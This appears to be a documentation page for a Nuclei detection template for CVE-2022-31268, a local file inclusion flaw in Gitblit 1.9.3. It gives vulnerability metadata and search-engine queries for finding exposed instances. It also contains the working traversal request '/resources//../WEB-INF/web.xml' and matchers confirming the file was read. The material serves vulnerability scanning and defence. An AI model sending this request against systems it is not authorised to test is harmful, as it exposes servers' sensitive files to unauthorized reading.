Gitblit 1.9.3 - Local File Inclusion
ID: CVE-2022-31268
Severity: high
Author: 0x_Akoko
Tags: cve,cve2022,lfi,gitblit
Description
Section titled “Description”Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
YAML Source
Section titled “YAML Source”id: CVE-2022-31268
info: name: Gitblit 1.9.3 - Local File Inclusion author: 0x_Akoko severity: high description: | Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). reference: - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - https://vuldb.com/?id.200500 - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 - https://github.com/Marcuccio/kevin - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31268 cwe-id: CWE-22 epss-score: 0.00618 epss-percentile: 0.76574 cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gitblit product: gitblit shodan-query: - http.html:"Gitblit" - http.title:"gitblit" - http.html:"gitblit" fofa-query: - title="gitblit" - body="gitblit" google-query: intitle:"gitblit" tags: cve,cve2022,lfi,gitblit
http: - method: GET path: - "{{BaseURL}}/resources//../WEB-INF/web.xml"
matchers-condition: and matchers: - type: word part: body words: - "</web-app>" - "java.sun.com" - "gitblit.properties" condition: and
- type: word part: header words: - "application/xml"
- type: status status: - 200# digest: 4b0a00483046022100a9fb38612b71d5a0b406a297f1998893cf179f6448a3199a368618cd6a56a111022100d457024db819eca193c53f9d2898ff1a72abfe37c86d867052a5c55f631349fd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31268.yaml"